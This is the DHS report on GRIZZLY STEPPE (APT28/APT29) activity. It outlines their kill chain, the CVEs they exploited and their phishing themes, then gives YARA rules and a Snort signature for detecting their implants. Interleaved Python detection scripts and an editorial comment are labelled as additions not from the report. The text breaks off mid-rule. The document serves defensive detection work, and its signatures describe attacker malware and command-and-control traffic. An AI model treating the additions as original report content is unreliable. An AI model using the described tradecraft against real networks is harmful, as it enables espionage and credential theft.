Enhanced Analysis of GRIZZLY STEPPE Activity 
Executive Summary 


The Department of Homeland Security (DHS) National Cybersecurity and Communications 
Integration Center (NCCIC) has collaborated with interagency partners and private-industry 
stakeholders to provide an Analytical Report (AR) with specific signatures and recommendations 
to detect and mitigate threats from GRIZZLY STEPPE actors. 
Recommended Reading about GRIZZLY STEPPE 

DHS recommends reading multiple bodies of work concerning GRIZZLY STEPPE. While DHS 
does not endorse any particular company or their findings, we believe the breadth of literature 
created by multiple sources enhances the overall understanding of the threat. DHS encourages 
analysts to review these resources to determine the level of threat posed to their local network 
environments. 

DHS Resources 

JAR-16-20296 provides technical details regarding the tools and infrastructure used by the 
Russian civilian and military intelligence services (RIS) to compromise and exploit networks 
and endpoints associated with the U.S. election, as well as a range of U.S. Government, political, 
and private sector entities. JAR-16-20296 remains a useful resource for understanding APT28's 
and APT29's use of the cyber kill chain and their exploit targets. Additionally, JAR-16-20296 
discusses some of the differences in activity between APT28 and APT29. This AR primarily 
focuses on APT28 and APT29 activity from 2015 through 2016. 

DHS Malware Initial Findings Report (MIFR)-10105049 UPDATE 2 was updated January 27, 
2017 to provide additional analysis of the artifacts identified in JAR-16-20296. The artifacts 
analyzed in this report include 17 PHP files, 3 executables and 1 RTF file. The PHP files are web 
shells designed to provide a remote user an interface for various remote operations. The RTF file 
is a malicious document designed to install and execute a malicious executable. DHS 
recommends that analysts read the MIFR in full to develop a better understanding of how the 
GRIZZLY STEPPE malware executes on a system, which, in turn, downloads additional 
malware and attempts to extract cached passwords. The remaining two executables are Remote 
Access Tools (RATs) that collect host information, including digital certificates and private keys, 
and provide an actor with remote access to the infected system. 

Open Source 

Several cyber security and threat research firms have written extensively about GRIZZLY 
STEPPE. DHS encourages network defenders, threat analysts, and general audiences to review 
publicly available information to develop a better understanding of the tactics, techniques, and 
procedures (TTPs) of APT28 and APT29 and to potentially mitigate against GRIZZLY STEPPE 
activity. 

The examples below do not constitute an exhaustive list. The U.S. Government does not endorse 
or support any particular product or vendor. 


TLP:WHITE 
Source | Title | Group 
Crowdstrike | Bears in the Midst: Intrusion into the DNC | APT28/29 
ESET | En Route with Sednit version 1.0 | APT28 
ESET | Visiting The Bear Den | APT28 
FireEye | APT28: A Window Into Russia's Cyber Espionage Operations? | APT28 
FireEye | HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group | APT29 
FireEye | APT28: At the Center of the Storm - Russia strategically evolves its cyber operations | APT28 
F-Secure | BlackEnergy & Quedagh: the convergence of crimeware and APT attacks, TLP: WHITE | APT28 
F-Secure | The Dukes: 7 years of Russian cyberespionage | APT29 
F-Secure | COSMICDUKE: Cosmu with a twist of MiniDuke | APT29 
F-Secure | OnionDuke: APT Attacks Via the Tor Network | APT29 
F-Secure | COZYDUKE | APT29 
Kaspersky | Sofacy APT hits high profile targets with updated toolset | APT28 
Crysys | Miniduke: Indicators | APT29 
Palo Alto Networks | ‘DealersChoice’ is Sofacy’s Flash Player Exploit Platform | APT28 
Palo Alto Networks | Sofacy’s ‘Komplex’ OS X Trojan | APT28 
Palo Alto Networks | The Dukes R&D Finds a New Anti-Analysis Technique - Palo Alto Networks Blog | APT29 
Palo Alto Networks | Tracking MiniDionis: CozyCar’s New Ride Is Related to Seaduke | APT29 
PwC | APT28: Sofacy? So-funny | APT28 
PwC | Cyber Threat Operations: Tactical Intelligence Bulletin - Sofacy Phishing | APT28 
Securelist | The CozyDuke APT | APT29 
Secureworks | Threat Group-4127 Targets Hillary Clinton Presidential Campaign | APT28 
ThreatConnect | ThreatConnect and Fidelis Team Up to Explore the DCCC Breach | APT28 
ThreatConnect | ThreatConnect follows Guccifer 2.0 to Russian VPN Service | APT28 
ThreatConnect | ThreatConnect Identifies Additional Infrastructure in DNC Breach | APT28/29 
ThreatConnect | Belling the BEAR | APT28 
ThreatConnect | Can a BEAR Fit Down a Rabbit Hole? | APT28 
Trend Micro | Operation Pawn Storm Using Decoys to Evade Detection | APT28 
Trend Micro | Pawn Storm Ramps Up Spear-phishing Before Zero-Days Get Patched | APT28 
Volexity | PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs | APT29 
Trend Micro | Operation Pawn Storm: Fast Facts and the Latest Developments | APT29 
ESET | En Route with Sednit - Part 2: Observing the Comings and Goings | APT28 
Utilizing Cyber Kill Chain for Analysis 


DHS analysts leverage the Cyber Kill Chain model to analyze, discuss, and dissect malicious 
cyber activity. The phases of the Cyber Kill Chain are Reconnaissance, Weaponization, 
Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective. This 
section will provide a high-level overview of GRIZZLY STEPPE activity within this framework. 

Reconnaissance 

GRIZZLY STEPPE actors use various reconnaissance methods to determine the best attack 
vector for compromising their targets. These methods include network vulnerability scanning, 
credential harvesting, and using “doppelganger” (also known as “typo-squatting”) domains to 
target victim organizations. The doppelganger domains can be used for reconnaissance when 
users incorrectly type the web address in a browser, or as part of delivery as a URL in the body 
of a phishing email. DHS recommends that network defenders review and monitor their 
networks for traffic to sites that look similar to their own domains. This can be an indicator of 
compromise that should trigger further research to determine whether a breach has occurred. 
Often, these doppelganger sites are registered to suspicious IP addresses. For example, a site 
pretending to be an organization’s User Log In page resolving to a TOR node IP address may be 
considered suspicious and should be researched by the organization’s security operations center 
(SOC) for signs of users navigating to that site. Because these doppelganger sites normally 
mimic the targeted victim’s domain, they were not included in JAR-16-20296. 
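The monitoring step recommended above can be scripted. The following is an added example, not code from the DHS report: it scores every destination host in a proxy log against an organization's own domains, folding common homoglyph substitutions and using edit distance, and lists the lookalikes for SOC review. The domain names and log lines are constructed sample data, and the two-label registrable-domain rule is a simplifying assumption.

```python
"""Flag proxy-log destinations that look like an organization's own domains.

Added example, not code from the DHS report. The report recommends monitoring
for traffic to "doppelganger" (typo-squatting) sites that mimic the victim's
domain. This script compares each destination host in a proxy log with the
organization's legitimate domains and lists the lookalikes for SOC review.
The domain names and log lines are constructed sample data.
"""
import re
from collections import namedtuple

# Constructed: the organization's own domains (hypothetical names).
OWN_DOMAINS = ["example-corp.com", "mail.example-corp.com"]

# Constructed sample proxy log: timestamp, client, method, URL.
SAMPLE_LOG = """\
1478000001 10.0.0.12 GET http://mail.example-corp.com/owa/
1478000002 10.0.0.13 GET http://exarnple-corp.com/login
1478000003 10.0.0.14 POST http://example-c0rp.com/owa/auth.owa
1478000004 10.0.0.15 GET http://www.microsoft.com/
1478000005 10.0.0.16 GET http://examplecorp.com/
1478000006 10.0.0.17 GET http://example-corp.com.login-portal.net/owa/
"""

Hit = namedtuple("Hit", "host reason distance")


def registrable(host: str) -> str:
    """Last two labels of a host name. Assumes a one-label public suffix such as
    .com; a production version should use the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def normalize(label: str) -> str:
    """Fold visually confusable substitutions commonly used in typo-squatting."""
    return (label.replace("rn", "m").replace("vv", "w")
                 .replace("0", "o").replace("1", "l").replace("3", "e"))


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute or swap
    two adjacent characters, each costing 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(host: str, own_domains=OWN_DOMAINS, max_distance: int = 2):
    """Return a Hit when host impersonates one of our domains, else None."""
    host = host.lower()
    own = {registrable(d) for d in own_domains}
    reg = registrable(host)
    if reg in own:
        return None                      # genuinely ours (any subdomain)
    for d in own:
        # Our domain used as a label prefix of a foreign domain, e.g.
        # example-corp.com.login-portal.net
        if re.search(r"(^|\.)" + re.escape(d) + r"(\.|$)", host):
            return Hit(host, "embeds " + d, 0)
        dist = damerau_levenshtein(normalize(reg.split(".")[0]),
                                   normalize(d.split(".")[0]))
        if dist <= max_distance:
            return Hit(host, "lookalike of " + d, dist)
    return None


def scan_log(text: str, own_domains=OWN_DOMAINS):
    """Run classify() over every destination host in a proxy log."""
    hits = []
    for line in text.splitlines():
        m = re.match(r"\S+\s+\S+\s+\S+\s+(?:https?://)?([^/\s:]+)", line)
        if m:
            hit = classify(m.group(1), own_domains)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h.host:40} {h.reason} (distance {h.distance})")
```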

Before the 2016 U.S. election, DHS observed network scanning activity, a form of 
reconnaissance. The IPs identified performed vulnerability scans attempting to identify websites 
that are vulnerable to cross-site scripting (XSS) or Structured Query Language (SQL) injection 
attacks. When GRIZZLY STEPPE actors identify a vulnerable site, they can then attempt to 
exploit the identified vulnerabilities to gain access to the targeted network. Network perimeter 
scans are often a precursor to network attacks, and DHS recommends that security analysts 
identify the types of scans carried out against their perimeters. This information can aid security 
analysts in identifying and patching vulnerabilities in their systems. 

Another common method used by GRIZZLY STEPPE is to host credential-harvesting pages as 
seen in Step 4 and Step 5 of the GRIZZLY STEPPE attack lifecycle graphic. This technique 
includes hosting a temporary website in publicly available infrastructure (i.e., neutral space) that 
users are directed to via spear-phishing emails. Users are tricked into entering their credentials in 
these temporary sites, and GRIZZLY STEPPE actors gain legitimate credentials for users on the 
targeted network. 
Weaponization 

GRIZZLY STEPPE actors have excelled at embedding malicious code into a number of file 
types as part of their weaponization efforts. In 2014, it was reported that GRIZZLY STEPPE 
actors were wrapping legitimate executable files with malware (named “OnionDuke”) to 
increase the chance of bypassing security controls. Since weaponization actions occur within the 
adversary space, there is little that can be detected by security analysts during this phase. APT28 
and APT29 weaponization methods have included: 

• Code injects in websites as watering hole attacks 

• Malicious macros in Microsoft Office files 

• Malicious Rich Text Format (RTF) files with embedded malicious flash code 

Delivery 

As described in JAR-16-20296 and numerous publicly available resources, GRIZZLY STEPPE 
actors traditionally use spear-phishing emails to deliver malicious attachments or URLs that lead 
to malicious payloads. DHS recommends that network defenders conduct analysis of their 
systems to identify potentially malicious emails involving variations on GRIZZLY STEPPE 
themes. Inbound email subjects should be reviewed for the following commonly employed 
titles, text, and themes: 

• efax, e-Fax, efax #100345 (random sequence of numbers) 

• PDF, PFD, Secure PDF 

• Topics from current events (e.g., “European Parliament statement on...”) 

• Fake Microsoft Outlook Web Access (OWA) log-in emails 

• Invites for cyber threat events 

Additionally, GRIZZLY STEPPE actors have infected pirated software in torrent services and 
leveraged TOR exit nodes to deliver malware since at least 2014. These actors are capable of 
compromising legitimate domains and services to host and deliver malware in an attempt to 
obscure their delivery methods. DHS notes that the majority of TOR traffic is not GRIZZLY 
STEPPE activity. The existence of a TOR IP in a network log only indicates that network 
administrators should review the related traffic to determine if it is legitimate activity for that 
specific environment. 

Exploitation 

GRIZZLY STEPPE actors have developed malware to exploit a number of Common 
Vulnerabilities and Exposures (CVEs). DHS assesses that these actors commonly target Microsoft 
Office exploits due to the high likelihood of having this software installed on the targeted hosts. 
While not all-encompassing, the following CVEs have been targeted by GRIZZLY STEPPE 
actors in past attacks. 

• CVE-2016-7855 : Adobe Flash Player Use-After-Free Vulnerability 

• CVE-2016-7255 : Microsoft Windows Elevation of Privilege Vulnerability 

• CVE-2016-4117 : Adobe Flash Player Remote Attack Vulnerability 

• CVE-2015-1641 : Microsoft Office Memory Corruption Vulnerability 

• CVE-2015-2424 : Microsoft PowerPoint Memory Corruption Vulnerability 

• CVE-2014-1761 : Microsoft Office Denial of Service (Memory Corruption) 

• CVE-2013-2729 : Integer Overflow in Adobe Reader and Acrobat vulnerability 

• CVE-2012-0158 : ActiveX Corruption Vulnerability for Microsoft Office 

• CVE-2010-3333 : RTF Stack Buffer Overflow Vulnerability for Microsoft Office 

• CVE-2009-3129 : Microsoft Office Compatibility Pack for Remote Attacks 

Installation 

GRIZZLY STEPPE actors have leveraged several different types of implants in the past. 
Analysts can research these implants by reviewing open-source reporting on malware families 
including Sofacy and OnionDuke. Recently, DHS analyzed 17 PHP files, 3 executables, and 1 
RTF file attributed to GRIZZLY STEPPE actors; the findings are located in MIFR-
10105049-Update2 (updated on 1/26/2017). The PHP files are web shells designed to provide a 
user interface for various remote operations. The RTF file is a malicious document designed to 
install and execute a malicious executable. DHS recommends that security analysts review their 
systems for unauthorized web shells. 

Command and Control 

GRIZZLY STEPPE actors leverage their installed malware through Command and Control (C2) 
infrastructure, which they traditionally develop via compromised sites and publicly available 
infrastructure, such as TOR. C2 IOCs are traditionally the IP addresses or domains that are 
leveraged to send and receive commands to and from malware implants. 

Actions on the Objective 

GRIZZLY STEPPE actors have leveraged their malware in multiple campaigns with various end 
goals. GRIZZLY STEPPE actors are capable of utilizing their malware to conduct extensive data 
exfiltration of sensitive files, emails, and user credentials. Security operations center (SOC) 
analysts may be able to detect actions on the objective before data exfiltration occurs by looking 
for signs of file and user credential movement within their network. 

Detection and Response 


The appendixes of this Analysis Report provide detailed host and network signatures to aid in 
detecting and mitigating GRIZZLY STEPPE activity. This information is broken out by actor 
and implant version whenever possible. MIFR-10105049 UPDATE2 provides additional YARA 
rules and IOCs associated with APT28 and APT29 actors. 

Contact Information 


Recipients of this report are encouraged to contribute any additional information that they may 
have related to this threat. For any questions related to this report, please contact NCCIC at: 

Phone: +1-703-235-8832 

Email: ncciccustomerservice@hq.dhs.gov 

Feedback 


DHS strives to make this report a valuable tool for our partners and welcomes feedback on how 
this publication could be improved. You can help by answering a few short questions about this 
report at the following URL: https://www.us-cert.gov/forms/feedback 
APPENDIX A: APT28 


This section describes six implants associated with APT28 actors. Included are YARA rules as 
well as SNORT signatures. Despite the use of sound production rules, there is still the chance for 
false positives. These signatures are meant to complement additional analysis and should not be 
used as the sole source of attribution. 

The following YARA rules detect Downrage, referred to as IMPLANT 1 in the rule naming 
convention. These rules will also detect X-AGENT/CHOPSTICK, which shares characteristics 
with DOWNRAGE. 
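The rules that follow all share two building blocks: a file-type gate on the leading bytes (the uint16(0), uint32(0) and uint32(1) checks) and hex strings in YARA's wildcard, jump and alternation syntax. As an added example that is not part of the report, the Python below reimplements both so a rule string copied from this appendix can be tried against a sample buffer without a YARA engine; the buffers are constructed test data and the rule evaluation is a simplified stand-in for YARA's.

```python
"""Evaluate the building blocks of the APT28 YARA rules without a YARA engine.

Added example, not code from the DHS report. Every rule in this appendix combines
a file-type gate on the leading bytes with hex strings written in YARA's wildcard
(??, 5?), jump ([n-m]) and alternation ((a|b)) syntax. The helpers below apply the
same gate and translate a hex string into a bytes regex. The buffers built below
are constructed test data, not malware.
"""
import re
import struct


def file_type_gate(data: bytes) -> bool:
    """The rules' shared condition prefix. YARA's uintN(offset) reads little-endian,
    so 0x5A4D is 'MZ' (PE), 0xCFD0 is D0 CF (OLE2/Office), 0xC3D4 is D4 C3 (pcap),
    uint32(0) == 0x46445025 is '%PDF' and uint32(1) == 0x6674725C is '\\rtf' at
    offset 1, i.e. a file starting '{\\rtf'."""
    if len(data) < 5:
        return False
    u16_0 = struct.unpack_from("<H", data, 0)[0]
    u32_0 = struct.unpack_from("<I", data, 0)[0]
    u32_1 = struct.unpack_from("<I", data, 1)[0]
    return (u16_0 in (0x5A4D, 0xCFD0, 0xC3D4)
            or u32_0 == 0x46445025 or u32_1 == 0x6674725C)


_TOKEN = re.compile(r"\[(\d+)(?:-(\d+))?\]|\(([0-9a-fA-F?\s|]+)\)|([0-9a-fA-F?]{2})")


def _byte_class(tok: str) -> bytes:
    """Regex fragment for one hex token: literal (8B), full wildcard (??) or
    nibble wildcard (5? / ?5)."""
    if tok == "??":
        return b"."
    hi, lo = tok[0], tok[1]
    vals = [v for v in range(256)
            if (hi == "?" or v >> 4 == int(hi, 16))
            and (lo == "?" or v & 0xF == int(lo, 16))]
    return b"[" + b"".join(b"\\x%02x" % v for v in vals) + b"]"


def hex_string_to_regex(hex_string: str) -> "re.Pattern[bytes]":
    """Translate e.g. '{ 8d ?? fa [2] e8 (22 | 07) 5? }' into a compiled bytes regex."""
    body = hex_string.strip().strip("{}")
    parts, pos = [], 0
    for m in _TOKEN.finditer(body):
        if body[pos:m.start()].strip():          # only whitespace may separate tokens
            raise ValueError("malformed hex string near: " + body[pos:m.start()])
        pos = m.end()
        if m.group(1) is not None:               # [n] or [n-m] jump
            parts.append(b".{%d,%d}" % (int(m.group(1)), int(m.group(2) or m.group(1))))
        elif m.group(3) is not None:             # (aa bb | cc) alternation
            alts = [b"".join(_byte_class(t) for t in alt.split())
                    for alt in m.group(3).split("|")]
            parts.append(b"(?:" + b"|".join(alts) + b")")
        else:
            parts.append(_byte_class(m.group(4)))
    if body[pos:].strip():
        raise ValueError("malformed hex string near: " + body[pos:])
    return re.compile(b"".join(parts), re.DOTALL)   # DOTALL: '.' must match 0x0A too


def match_rule(data: bytes, hex_strings: dict, how: str = "all") -> dict:
    """Simplified rule evaluation: gate AND ('all' or 'any' of the hex strings)."""
    gate = file_type_gate(data)
    hits = {name: hex_string_to_regex(hs).search(data) is not None
            for name, hs in hex_strings.items()}
    quorum = all(hits.values()) if how == "all" else any(hits.values())
    return {"gate": gate, "matched": {n for n, ok in hits.items() if ok},
            "rule_fires": gate and quorum}


# Hex strings copied from IMPLANT_1_v1, IMPLANT_2_v1 and IMPLANT_1_v6 in this appendix.
IMPLANT_1_V1_STR1 = ("{6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0 EB 02 "
                     "33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59}")
IMPLANT_2_V1_STR1 = "{ 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01}"
IMPLANT_1_V6_EAX = "{ 35 (22 | 07 | 15 | 0e | 56 | d7 | a7 | 0a) }"

# Constructed test buffer: a fake MZ header followed by bytes satisfying all three strings.
SAMPLE_MZ = (b"MZ" + b"\x00" * 62
             + bytes.fromhex("6A01E81122FFFF5985C0740B8BC8E83344FFFF8BF0EB0233F6"
                             "8BCEE85566FFFF85F6740E8BCEE87788FFFF56E899AAFFFF59")
             + b"\x90" * 8 + bytes.fromhex("3507")
             + bytes.fromhex("8D45FA0102E80304FFFFC745F0000000008D45F0566A006A01"))
# Same payload behind a non-matching header: the strings hit but the gate fails.
SAMPLE_TXT = b"plain text prefix, not one of the gated file types: " + SAMPLE_MZ[64:]

if __name__ == "__main__":
    print(match_rule(SAMPLE_MZ, {"STR1": IMPLANT_1_V1_STR1}))
    print(match_rule(SAMPLE_MZ, {"jump": IMPLANT_2_V1_STR1, "alt": IMPLANT_1_V6_EAX}))
    print(match_rule(SAMPLE_TXT, {"STR1": IMPLANT_1_V1_STR1}))
```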

rule IMPLANT_1_v1 
{ 
    strings: 
        $STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0 EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_1_v2 
{ 
    strings: 
        $STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00 00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 } 
        $STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81 80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 } 
    condition: 
        (uint16(0) == 0x5A4D) and any of them 
} 
rule IMPLANT_1_v3 
{ 
    strings: 
        $rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them 
} 

rule IMPLANT_1_v4 
{ 
    strings: 
        $XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ?? ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 } 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_1_v5 
{ 
    strings: 
        $drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77 [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 } 
        $mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C 36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them 
} 

rule IMPLANT_1_v6 
{ 
    strings: 
        $XORopcodes_eax = { 35 (22 | 07 | 15 | 0e | 56 | d7 | a7 | 0a) } 
        $XORopcodes_others = { 81 (f1 | f2 | f3 | f4 | f5 | f6 | f7) (22 | 07 | 15 | 0e | 56 | d7 | a7 | 0a) } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025) and any of them 
} 

rule IMPLANT_1_v7 
{ 
    strings: 
        $XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF } 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 


Network Indicators for Implant 1 

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Downrage_HTTP_C2"; flow:established,to_server; content:"POST"; http_method; content:"="; content:"=|20|HTTP/1.1"; fast_pattern; distance:19; within:10; pcre:"/^\/(?:[a-zA-Z0-9]{2,6}\/){2,5}[a-zA-Z0-9]{1,7}\.[A-Za-z0-9\+\-\_\.]+\/\?[a-zA-Z0-9]{1,3}=[a-zA-Z0-9+\/]{19}=$/I";) 

The following YARA rules detect CORESHELL/SOURFACE, referred to as IMPLANT 2 in the rule 
naming convention. 


IMPLANT 2 Rules: 
rule IMPLANT_2_v1 
{ 
    strings: 
        $STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v2 
{ 
    strings: 
        $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v3 
{ 
    strings: 
        $STR1 = {c1eb078d??01321c??33d2} 
        $STR2 = {2b??83??060f83??000000eb0233} 
        $STR3 = {89????89????8955??8945??3b??0f83??0000008d????8d????fe} 
    condition: 
        (uint16(0) == 0x5A4D) and any of them 
} 
rule IMPLANT_2_v4 
{ 
    strings: 
        $STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v5 
{ 
    strings: 
        $STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v6 
{ 
    strings: 
        $STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F } 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v7 
{ 
    strings: 
        // NOTE: as printed in the report, $STR1 has an odd number of hex digits and will not compile as-is; 
        // verify it against the original before use. 
        $STR1 = {0a0fafd833d28d41fff775??8b450cc1eb078d7901321c0233d28bc7895de4bb06000000f7f38b450c8d59fe025dff321c028bc133d2b906000000f7f18b450c8bcf221c028b45e48b55e008d41fe83f8068b45??72??8b4d??8b} 
        $STR2 = {8d9b000000000fb65c0afe8d34028b45??03c20fafd88d7a018d42ff33d2f775??c1eb078bc7321c0a33d2b906000000f7f18a4d??8b450c80e902024d??320c028b45??33d2f7757?8b450c220c028bd702d9301e8b4d0c8d42fe3b45e88b45??8955??72a05f5e5b8be55dc20800} 
    condition: 
        (uint16(0) == 0x5A4D) and any of them 
} 

rule IMPLANT_2_v8 
{ 
    strings: 
        $STR1 = {8b??448944246041f7e08bf2b8abaaaaaac1ee0289742458448b??41f7??8bcaba03000000c1e902890c248d044903c0442b??4489??24043bf10f83??0100008d1c764c896c24} 
        $STR2 = {c541f7e0????????????8d0c5203c92bc18bc8??8d04??460fb60c??4002c7418d48ff4432c8b8abaaaaaaf7e1c1ea028d045203c02bc8b8abaaaaaa46220c?7418d48fef7e1c1ea028d045203c02bc88bc1} 
        $STR3 = {41f7e0c1ea02418bc08d0c5203c92bc18bc8428d041b460fb60c?74002c6418d48ff4432c8b8abaaaaaaf7e1c1ea028d045203c02bc8b8abaaaaaa} 
        $STR4 = {46220c??418d48fef7e1c1ea028d04528b54245803c02bc88bc10fb64fff420fb60477410fafcbc1} 
    condition: 
        (uint16(0) == 0x5A4D) and any of them 
} 
rule IMPLANT_2_v9 
{ 
    strings: 
        $STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89 45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6 8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE 3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8 0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33 C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02 C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F 02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01 FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33 D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45 E4 30 1C 01 8B 4D 0C } 
    condition: 
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them 
} 


rule IMPLANT_2_v10 
{ 
    strings: 
        $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v11 
{ 
    strings: 
        $STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v12 
{ 
    strings: 
        $STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v13 
{ 
    strings: 
        $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} 
    condition: 
        (uint16(0) == 0x5A4D) and all of them 
} 

rule IMPLANT_2_v14 
{ 
    strings: 
        $STR1 = {8b??448944246041f7e08bf2b8abaaaaaac1ee0289742458448b??41f7??8bcaba03000000c1e902890c248d044903c0442b?74489??24043bf10f83??0100008d1c764c896c24} 
